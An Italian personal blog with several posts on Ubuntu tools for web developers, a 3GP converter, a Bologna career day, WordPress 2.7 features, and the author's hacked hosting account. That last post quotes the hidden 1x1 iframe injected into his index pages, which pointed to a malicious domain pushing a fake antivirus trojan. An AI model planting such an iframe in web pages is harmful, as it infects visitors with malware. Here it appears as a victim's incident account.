Simone Chiaromonte

Vista la mia totale migrazione su Ubuntu, via via che ho bisogno di risolvere qualche necessità cerco la soluzione su internet e me la annoto nel mio blog.

Se avete bisogno di convertire un video fatto con il cellulare in formato 3GP e volete trasformarlo in mpeg, avi, o comunque ascoltarne l’audio su linux, avete bisogno di scaricare questo programma: Mobile Media Converter, installabile immediatamente su Ubuntu grazie al pacchetto Deb. Provatelo e commentate se vi è servito! :)

Voglio condividere con voi i miei strumenti di lavoro su Ubuntu che, ormai, è diventato il sistema operativo che preferisco di più per tanti motivi; ma non andiamo fuori tema e vediamo quali sono i software che ogni sviluppatore di siti web dovrebbe aver installato nella sua postazione:

Firefox Browser

Indispensabile a dir poco, questo browser è perfetto per gli sviluppatori perché la vasta gamma di componenti aggiuntivi installabili semplifica e velocizza il lavoro di noi web designer. Ecco quelli che uso:

• Firebug: permette di analizzare il codice delle pagine con la comodità di notare in tempo reale quale div stiamo selezionando e di visualizzare e modificare il CSS che, modificandolo, ci permetterà di vedere le variazioni direttamente sul browser.
• Colorzilla: utilissimo per vedere il codice RGB dei colori utilizzati in una pagina web, nonchè per evidenziare e capire quale div stiamo selezionando in quel momento.
• Seo for Firefox: plugin che utilizzo principalmente per vedere alcune informazioni dei siti (PR, whois, data registrazione) quando eseguo una ricerca su Google e anche per analizzare le pagine dei siti per rendermi conto quali sono i link che hanno l’attributo “nofollow”, i link interni ed esterni.

Cosa manca:

Non esitate a scrivermi se trovate questi plugin per firefox:

• Validatore HTML: purtroppo Tidy non funziona su linux.

Cosa non uso:

• WebDeveloper: attulamente ne faccio a meno ma a molti di voi potrebbe fare molto comodo.

Editor HTML e PHP

Ho trovato un‘ottima alternativa a Dreamweaver (che tutt’ora amo) che permette anche di lavorare su file in remoto con acesso FTP: e questo mi può anche bastare! Sto parlando di APTANA che è un derivato di Eclipse e che è così diffuso che oggi conta più di 3 milioni di Download.

Utilissimo perchè, grazie a questo framework, si riescono a realizzare siti web e moduli in AJAX importando le librerie Javascript come Jquery e MooTools. E’ a dir porco fantastico!

Client FTP

Senza di questo non riusciamo a fare molto! Per trasferire i file sul mio server utilizzo FileZilla che è praticamente uguale a FlashFXP.

Editor e Batch di Immagini

Degli ottimi strumenti per realizzare e modificare immagini per i nostri siti web sono:

• Gimp: ormai conosciuto da tutti (spero!), ha più o meno le stesse funzionalità di PhotoShop ma per chi non ha bisogno di fare lavori particolamente complessi è un’ottima alternativa.
• Phatch: è un programma scritto in Python che permette di applicare modifiche a immagini in serie con una sola operazione da un semplicissimo e intuitivo pannello.

Server XAMPP

Per lavorare in locale con CMS o script creati da noi che hanno bisogno di un server Apache e di un database MySQL abbiamo bisogno di installare XAMPP che, in un modo davvero elementare, ci permette di trasformare la nostra macchina linux in un vero e proprio web server.

Non appena letta l’e-mail che mi avvisava di questo importantissimo evento ho subito revisionato il mio curriculum vitae e lo ho aggiornato con le nuove mansioni che ho imparato da Luglio 2008 ad oggi! Il 5 Fabbraio 2009 si terrà alla Fiera di Bologna la seconda edizione del Career Day che darà la possibilità a me e a tutti i ragazzi laureati e laureandi all’UniBo di farsi conoscere alle ditte che parteciperanno all’evento.

Le ditte non sono quelle che ho trovato allo IAB Forum (peccato!) ma… come posso sapere che “non interesso” fino a quando non mi faccio conoscere? :-)

Nella vita bisogna tentare! …e curriculum alla mano andrò a fare il twitter per gli stand, e chi può sapere quale porta mi si potrà aprire? Forse nessuna… forse tante… vedremo! Ma al di là dell’opportunità di lavoro, leggo dalla newsletter che ho ricevuto che ci saranno dei workshop… e queste cose per me sono come delle calamite! :-D

L’ingresso è gratuito a chiunque; per chi fosse interessato ecco il sito ufficiale del Career Day 2009 di Bologna!

E che volete farci! Ci sono e in qualche modo bisogna conviverci: scrivo questo post un po’ in ritardo ma il 26 Dicembre, grazie alla segnalazione di Paolo (quando metti su il blog avvisami), un mio lettore, mi sono effettivamente accorto che il mio sito e moltissimi altri nel mio hosting hanno subito un attacco hacker.

Praticamente, probabilmente sfruttando le debolezze dell’hosting oppure utilizzando le mie credenziali di accesso via FTP (cosa che mi sembra molto improbabile), è riuscito a modificare tutte le pagine index (sia html che php) di tutti i miei siti web inserendo il seguente iframe:

<iframe src=”http://thedeadpit.com/?click=xxxxxx” width=1 height=1 style=”visibility:hidden position:absolute”>

e un codice che ora ho cancellato che si collegava a google-stats.com e forniva (probabilmente) tutte le informazioni dei visitatori ai miei siti, ma che non ha nulla a che fare con google! Infatti se provate a collegarvi a quel sito si vieni subito dirottati a Google.it! Incredibile!

L’iframe invece chiudeva il browser e generava un messaggio di errore nel quale si consigliava di istallare un antivirus (pensa un po’ che bell’antivirus poteva essere) cliccando su OK. Mi hanno segnalato che Avast Antivirus lo segnalava come Trojan, ma per noi che utilizziamo linux non abbiamo questo problema! :-)

Morale: ho dovuto controllare e modificare i file index.php (anche quelli che finivano con index es. BoardIndex.php) di tutti i miei siti web, e modificare anche le credenziali di accesso! Non so dire con esattezza quale possa essere stata la causa di questo problema; il supporto del mio hosting servage mi risponde così:

Our servers are secured. Most of attackers use an upload script that allows visitors of the website to upload files. Please change your account password and check that no folders have insecure permissions such as 777 (unlimited access).

Però le cartelle dei siti web avevano i permessi 755, il che significa che solo il proprietario ha i permessi di scrittura, per questo ho supposto che l’hacker ha probabilmente sfruttato le debolezze del server o ha “sgamato” la mia user e pass dell’FTP… ma non ci credo a quest’ultima ipotesi ;-)

Fantastico! …ok ok… adesso vi spiego tutto! Ma prima di farlo dovete subito aggiornare wordpress alla versione 2.7, e per farlo potete utilizzare la stessa guida che ho scritto un po’ di tempo fa: si aggiorna con lo stesso procedimento. Le novità sono d’impatto e utilissime, vediamole con più dettaglio:

• Dashboard rinnovata: i menu del pannello di amministrazione hanno una grafica totalmente nuova e i menu non hanno più la struttura orizzontale bensì verticale. Inoltre, se i menu ingombrano troppo oppure vogliamo avere una interfaccia diversa, si possono ridurre a icona con un semplice click. Ogni sezione si può personalizzare impostando quali pannelli e quali informazioni visualizzare o nascondere tramite il pulsante in alto “impostazioni schermo”.
• QuickPress integrato: nella bacheca troviamo di default il pannello di QuickPress, il plugin che serve a scrivere post in modo semplice e veloce, senza le funzionalità di formattazione del testo ma con la possibilità di inserire file multimediali.
• Commenti annidati: per gestire meglio le risposte dei commenti, possiamo settare fino a 10 livelli di risposte annidate in modo da capire subito a quale commento si sta riferendo.
• Installazione plugins: con la nuova versione di WP 2.7 i plugins si possono installare sia caricando i file .zip, sia ricercandoli direttamente nei repository di wordpress direttamente dalla pagina e installandoli con un semplice click!
• Aggiornamento WP in automatico: dal pannello strumenti è possibile effettuare l’aggiornamento alla nuova versione di WP semplicemente cliccando sul link “aggiorna wp alla nuova versione”! Proprio come se si installasse un plugin!

Le novità in wordpress 2.7 sono essenzialmente queste! …e per quanto mi riguarda ora posso risparmiare un sacco di tempo per istallare e testare i nuovi plugins e nell’aggiornare la versione di WP alla nuova versione. La nuova Dashboard mi permette anche di avere tutti i link alle funzionalità in un’unica pagine navigabile grazie alla tecnologia AJAX; che chiedere di più da wordpress? =)